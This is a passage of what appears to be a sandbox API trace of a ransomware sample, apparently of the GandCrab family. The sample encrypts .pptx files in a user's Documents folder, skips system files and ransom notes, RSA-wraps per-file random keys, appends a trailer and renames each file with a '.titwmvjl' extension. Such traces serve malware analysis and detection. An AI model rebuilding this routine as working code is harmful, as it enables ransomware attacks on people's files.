lpFindFileData=0x259f290) returned 0 [0091.875] FindClose (in: hFindFile=0x5038f8 | out: hFindFile=0x5038f8) returned 1 [0091.875] CloseHandle (hObject=0x2ac) returned 1 [0091.875] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0091.875] lstrcmpW (lpString1="QC3dt.pptx", lpString2=".") returned 1 [0091.875] lstrcmpW (lpString1="QC3dt.pptx", lpString2="..") returned 1 [0091.876] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="QC3dt.pptx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\QC3dt.pptx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\QC3dt.pptx" [0091.876] lstrlenW (lpString=".titwmvjl") returned 9 [0091.876] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\QC3dt.pptx") returned 42 [0091.876] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.876] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\QC3dt.pptx.titwmvjl") returned 51 [0091.876] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\QC3dt.pptx") returned 42 [0091.876] lstrlenW (lpString=".pptx") returned 5 [0091.876] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.876] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".pptx ") returned 6 [0091.876] lstrcmpiW (lpString1=".pptx", lpString2=".titwmvjl") returned -1 [0091.876] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.876] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\QC3dt.pptx") returned 42 [0091.876] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\QC3dt.pptx") returned 42 [0091.876] lstrcmpiW (lpString1="QC3dt.pptx", lpString2="desktop.ini") returned 1 [0091.876] lstrcmpiW (lpString1="QC3dt.pptx", lpString2="autorun.inf") returned 1 [0091.876] lstrcmpiW (lpString1="QC3dt.pptx", lpString2="ntuser.dat") returned 1 [0091.876] lstrcmpiW (lpString1="QC3dt.pptx", lpString2="iconcache.db") returned 1 [0091.876] lstrcmpiW (lpString1="QC3dt.pptx", lpString2="bootsect.bak") returned 1 [0091.876] lstrcmpiW (lpString1="QC3dt.pptx", lpString2="boot.ini") returned 1 [0091.876] lstrcmpiW (lpString1="QC3dt.pptx", lpString2="ntuser.dat.log") returned 1 [0091.876] lstrcmpiW (lpString1="QC3dt.pptx", lpString2="thumbs.db") returned -1 [0091.876] lstrcmpiW (lpString1="QC3dt.pptx", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0091.877] lstrcmpiW (lpString1="QC3dt.pptx", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0091.877] lstrcmpiW (lpString1="QC3dt.pptx", lpString2="KRAB-DECRYPT.html") returned 1 [0091.877] lstrcmpiW (lpString1="QC3dt.pptx", lpString2="CRAB-DECRYPT.html") returned 1 [0091.877] lstrcmpiW (lpString1="QC3dt.pptx", lpString2="KRAB-DECRYPT.txt") returned 1 [0091.877] lstrcmpiW (lpString1="QC3dt.pptx", lpString2="CRAB-DECRYPT.txt") returned 1 [0091.877] lstrcmpiW (lpString1="QC3dt.pptx", lpString2="ntldr") returned 1 [0091.877] lstrcmpiW (lpString1="QC3dt.pptx", lpString2="NTDETECT.COM") returned 1 [0091.877] lstrcmpiW (lpString1="QC3dt.pptx", lpString2="Bootfont.bin") returned 1 [0091.877] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\QC3dt.pptx") returned 42 [0091.877] lstrlenW (lpString=".pptx") returned 5 [0091.877] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.877] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".pptx ") returned 6 [0091.877] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.877] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.877] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\QC3dt.pptx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\qc3dt.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0091.878] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.878] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0091.878] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.878] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.879] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0091.879] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0091.879] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0091.879] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0091.879] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0091.879] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.879] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.879] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.880] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.880] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0091.880] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0091.880] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0091.880] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0091.880] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0091.880] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.881] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.881] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.881] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.881] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0091.881] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.881] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503838) returned 1 [0091.881] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.882] CryptGetKeyParam (in: hKey=0x503838, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0091.882] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.882] CryptEncrypt (in: hKey=0x503838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0091.882] GetLastError () returned 0x0 [0091.882] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.882] CryptDestroyKey (hKey=0x503838) returned 1 [0091.882] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.882] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.882] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.882] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0091.883] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.883] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5038f8) returned 1 [0091.883] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.883] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0091.883] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.883] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0091.884] GetLastError () returned 0x0 [0091.884] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.884] CryptDestroyKey (hKey=0x5038f8) returned 1 [0091.884] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.884] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.884] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0091.884] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0091.884] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x9b6b, lpOverlapped=0x0) returned 1 [0091.897] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffff6495, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.897] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x9b6b, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x9b6b, lpOverlapped=0x0) returned 1 [0091.898] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0091.899] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.903] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.903] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.903] CloseHandle (hObject=0x2ac) returned 1 [0091.904] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\QC3dt.pptx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\qc3dt.pptx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\QC3dt.pptx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\qc3dt.pptx.titwmvjl"), dwFlags=0x1) returned 1 [0091.904] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.904] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0091.904] lstrcmpW (lpString1="rlNIYIXIjsW.pptx", lpString2=".") returned 1 [0091.905] lstrcmpW (lpString1="rlNIYIXIjsW.pptx", lpString2="..") returned 1 [0091.905] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="rlNIYIXIjsW.pptx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\rlNIYIXIjsW.pptx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\rlNIYIXIjsW.pptx" [0091.905] lstrlenW (lpString=".titwmvjl") returned 9 [0091.905] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\rlNIYIXIjsW.pptx") returned 48 [0091.905] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.905] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\rlNIYIXIjsW.pptx.titwmvjl") returned 57 [0091.905] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\rlNIYIXIjsW.pptx") returned 48 [0091.905] lstrlenW (lpString=".pptx") returned 5 [0091.905] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.905] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".pptx ") returned 6 [0091.905] lstrcmpiW (lpString1=".pptx", lpString2=".titwmvjl") returned -1 [0091.905] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.905] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\rlNIYIXIjsW.pptx") returned 48 [0091.905] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\rlNIYIXIjsW.pptx") returned 48 [0091.905] lstrcmpiW (lpString1="rlNIYIXIjsW.pptx", lpString2="desktop.ini") returned 1 [0091.905] lstrcmpiW (lpString1="rlNIYIXIjsW.pptx", lpString2="autorun.inf") returned 1 [0091.905] lstrcmpiW (lpString1="rlNIYIXIjsW.pptx", lpString2="ntuser.dat") returned 1 [0091.905] lstrcmpiW (lpString1="rlNIYIXIjsW.pptx", lpString2="iconcache.db") returned 1 [0091.905] lstrcmpiW (lpString1="rlNIYIXIjsW.pptx", lpString2="bootsect.bak") returned 1 [0091.905] lstrcmpiW (lpString1="rlNIYIXIjsW.pptx", lpString2="boot.ini") returned 1 [0091.905] lstrcmpiW (lpString1="rlNIYIXIjsW.pptx", lpString2="ntuser.dat.log") returned 1 [0091.905] lstrcmpiW (lpString1="rlNIYIXIjsW.pptx", lpString2="thumbs.db") returned -1 [0091.905] lstrcmpiW (lpString1="rlNIYIXIjsW.pptx", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0091.906] lstrcmpiW (lpString1="rlNIYIXIjsW.pptx", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0091.906] lstrcmpiW (lpString1="rlNIYIXIjsW.pptx", lpString2="KRAB-DECRYPT.html") returned 1 [0091.906] lstrcmpiW (lpString1="rlNIYIXIjsW.pptx", lpString2="CRAB-DECRYPT.html") returned 1 [0091.906] lstrcmpiW (lpString1="rlNIYIXIjsW.pptx", lpString2="KRAB-DECRYPT.txt") returned 1 [0091.906] lstrcmpiW (lpString1="rlNIYIXIjsW.pptx", lpString2="CRAB-DECRYPT.txt") returned 1 [0091.906] lstrcmpiW (lpString1="rlNIYIXIjsW.pptx", lpString2="ntldr") returned 1 [0091.906] lstrcmpiW (lpString1="rlNIYIXIjsW.pptx", lpString2="NTDETECT.COM") returned 1 [0091.906] lstrcmpiW (lpString1="rlNIYIXIjsW.pptx", lpString2="Bootfont.bin") returned 1 [0091.906] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\rlNIYIXIjsW.pptx") returned 48 [0091.906] lstrlenW (lpString=".pptx") returned 5 [0091.906] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.906] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".pptx ") returned 6 [0091.906] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.906] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.906] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\rlNIYIXIjsW.pptx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\rlniyixijsw.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0091.907] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.907] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0091.907] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.908] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.908] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0091.908] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0091.908] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0091.908] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0091.908] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0091.908] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.909] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.909] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.909] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.909] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0091.909] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0091.909] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0091.910] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0091.910] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0091.910] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.910] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.910] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.910] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.910] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0091.910] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.910] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5035b8) returned 1 [0091.910] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.911] CryptGetKeyParam (in: hKey=0x5035b8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0091.911] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.911] CryptEncrypt (in: hKey=0x5035b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0091.911] GetLastError () returned 0x0 [0091.911] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.911] CryptDestroyKey (hKey=0x5035b8) returned 1 [0091.911] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.911] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.911] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.912] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0091.912] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.912] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503738) returned 1 [0091.912] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.912] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0091.912] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.912] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0091.913] GetLastError () returned 0x0 [0091.913] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.913] CryptDestroyKey (hKey=0x503738) returned 1 [0091.913] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.913] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.913] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0091.913] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0091.913] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0xdcbe, lpOverlapped=0x0) returned 1 [0091.927] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffff2342, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.928] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xdcbe, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0xdcbe, lpOverlapped=0x0) returned 1 [0091.929] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0091.930] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.933] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.934] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.934] CloseHandle (hObject=0x2ac) returned 1 [0091.935] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\rlNIYIXIjsW.pptx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\rlniyixijsw.pptx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\rlNIYIXIjsW.pptx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\rlniyixijsw.pptx.titwmvjl"), dwFlags=0x1) returned 1 [0091.938] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.938] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0091.938] lstrcmpW (lpString1="T1cl1qp.pptx", lpString2=".") returned 1 [0091.938] lstrcmpW (lpString1="T1cl1qp.pptx", lpString2="..") returned 1 [0091.938] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="T1cl1qp.pptx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\T1cl1qp.pptx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\T1cl1qp.pptx" [0091.938] lstrlenW (lpString=".titwmvjl") returned 9 [0091.938] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\T1cl1qp.pptx") returned 44 [0091.938] VirtualAlloc (lpAddress=0x0, dwSize=0x98, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.939] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\T1cl1qp.pptx.titwmvjl") returned 53 [0091.939] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\T1cl1qp.pptx") returned 44 [0091.939] lstrlenW (lpString=".pptx") returned 5 [0091.939] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.939] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".pptx ") returned 6 [0091.939] lstrcmpiW (lpString1=".pptx", lpString2=".titwmvjl") returned -1 [0091.939] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.939] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\T1cl1qp.pptx") returned 44 [0091.939] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\T1cl1qp.pptx") returned 44 [0091.939] lstrcmpiW (lpString1="T1cl1qp.pptx", lpString2="desktop.ini") returned 1 [0091.939] lstrcmpiW (lpString1="T1cl1qp.pptx", lpString2="autorun.inf") returned 1 [0091.939] lstrcmpiW (lpString1="T1cl1qp.pptx", lpString2="ntuser.dat") returned 1 [0091.939] lstrcmpiW (lpString1="T1cl1qp.pptx", lpString2="iconcache.db") returned 1 [0091.939] lstrcmpiW (lpString1="T1cl1qp.pptx", lpString2="bootsect.bak") returned 1 [0091.939] lstrcmpiW (lpString1="T1cl1qp.pptx", lpString2="boot.ini") returned 1 [0091.939] lstrcmpiW (lpString1="T1cl1qp.pptx", lpString2="ntuser.dat.log") returned 1 [0091.939] lstrcmpiW (lpString1="T1cl1qp.pptx", lpString2="thumbs.db") returned -1 [0091.939] lstrcmpiW (lpString1="T1cl1qp.pptx", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0091.939] lstrcmpiW (lpString1="T1cl1qp.pptx", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0091.939] lstrcmpiW (lpString1="T1cl1qp.pptx", lpString2="KRAB-DECRYPT.html") returned 1 [0091.939] lstrcmpiW (lpString1="T1cl1qp.pptx", lpString2="CRAB-DECRYPT.html") returned 1 [0091.939] lstrcmpiW (lpString1="T1cl1qp.pptx", lpString2="KRAB-DECRYPT.txt") returned 1 [0091.939] lstrcmpiW (lpString1="T1cl1qp.pptx", lpString2="CRAB-DECRYPT.txt") returned 1 [0091.940] lstrcmpiW (lpString1="T1cl1qp.pptx", lpString2="ntldr") returned 1 [0091.940] lstrcmpiW (lpString1="T1cl1qp.pptx", lpString2="NTDETECT.COM") returned 1 [0091.940] lstrcmpiW (lpString1="T1cl1qp.pptx", lpString2="Bootfont.bin") returned 1 [0091.940] lstrlenW 